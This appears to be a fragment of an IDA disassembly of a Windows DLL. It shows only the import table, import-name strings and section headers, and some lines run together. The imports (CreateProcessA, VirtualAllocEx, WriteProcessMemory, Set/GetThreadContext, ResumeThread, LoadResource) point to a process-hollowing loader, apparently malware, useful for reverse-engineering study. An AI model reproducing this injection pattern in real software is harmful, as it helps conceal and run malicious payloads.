dword_100060D8 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_100060DC dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_100060E0 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey align 8
dword_100060E8 dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValuedword_100060EC dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_100060F0 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_100060F4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA dd 0
dword_100060FC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_10006100 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_10006104 dd 7C80BC69h ; resolved to->KERNEL32.SizeofResourcedword_10006108 dd 7C862A69h ; resolved to->KERNEL32.SetThreadContextdword_1000610C dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_10006110 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_10006114 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_10006118 dd 7C809FB5h ; resolved to->KERNEL32.LoadResourcedword_1000611C dd 7C83970Dh ; resolved to->KERNEL32.GetThreadContextdword_10006120 dd 7C8260C2h ; resolved to->KERNEL32.FreeResourcedword_10006124 dd 7C80BE89h ; resolved to->KERNEL32.FindResourceAdword_10006128 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA align 10h
aKernel32_dll db 'kernel32.dll',0
align 10h
aDeletecritical db 'DeleteCriticalSection',0
align 4
aLeavecriticals db 'LeaveCriticalSection',0
align 10h
aEntercriticals db 'EnterCriticalSection',0
align 4
aInitializecrit db 'InitializeCriticalSection',0
align 4
aVirtualfree db 'VirtualFree',0
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 6F4C0000h, 466C6163h
dd 656572h, 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aGetcurrentthre db 'GetCurrentThreadId',0
align 10h
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 4D746547h
dd 6C75646Fh, 6C694665h, 6D614E65h, 4165h, 65470000h, 6D6F4374h
dd 646E616Dh, 656E694Ch, 41h, 65657246h, 7262694Ch, 797261h
dd 78450000h, 72507469h, 7365636Fh, 73h, 74697257h, 6C694665h
dd 65h, 61686E55h, 656C646Eh, 63784564h, 69747065h, 69466E6Fh
dd 7265746Ch, 0
aRtlunwind db 'RtlUnwind',0
align 4
aRaiseexception db 'RaiseException',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 72657375h, 642E3233h
dd 6C6Ch, 65470000h, 79654B74h, 72616F62h, 70795464h, 65h
dd 7373654Dh, 42656761h, 41786Fh, 68430000h, 654E7261h
dd 417478h, 61766461h, 32336970h, 6C6C642Eh, 0
aRegqueryvaluee db 'RegQueryValueExA',0
align 4
aRegopenkeyexa db 'RegOpenKeyExA',0
align 4
aRegclosekey db 'RegCloseKey',0
aKernel32_dll_0 db 'kernel32.dll',0
align 4
aTlssetvalue db 'TlsSetValue',0
dd 6C540000h, 74654773h, 756C6156h, 65h, 61636F4Ch, 6C6C416Ch
dd 636Fh, 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
aWriteprocessme db 'WriteProcessMemory',0
align 4
dd 69560000h, 61757472h, 6C6C416Ch, 7845636Fh, 0
aSizeofresource db 'SizeofResource',0
align 4
db 0
align 2
aSetthreadconte db 'SetThreadContext',0
align 4
db 0
align 2
aResumethread db 'ResumeThread',0
align 4
db 0
align 2
aReadprocessmem db 'ReadProcessMemory',0
dd 6F4C0000h, 65526B63h, 72756F73h, 6563h, 6F4C0000h, 65526461h
dd 72756F73h, 6563h, 65470000h, 72685474h, 43646165h, 65746E6Fh
dd 7478h, 72460000h, 65526565h, 72756F73h, 6563h, 69460000h
dd 6552646Eh, 72756F73h, 416563h, 72430000h, 65746165h
dd 636F7250h, 41737365h
db 2 dup(0)
_idata ends
; Section 5. (virtual address 00007000)
; Virtual size : 00000008 ( 8.)
; Section size in file : 00000008 ( 8.)
; Offset to raw data for section: 00007000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 10007000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
TlsStart dd 2 dup(0) ; DATA XREF: .rdata:TlsDirectory�o
_tls ends
; Section 6. (virtual address 00008000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 00008000
; Flags 50000040: Data Shareable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 10008000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd 10007008h
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
_rdata ends
; Section 9. (virtual address 00058000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00057200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 10058000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start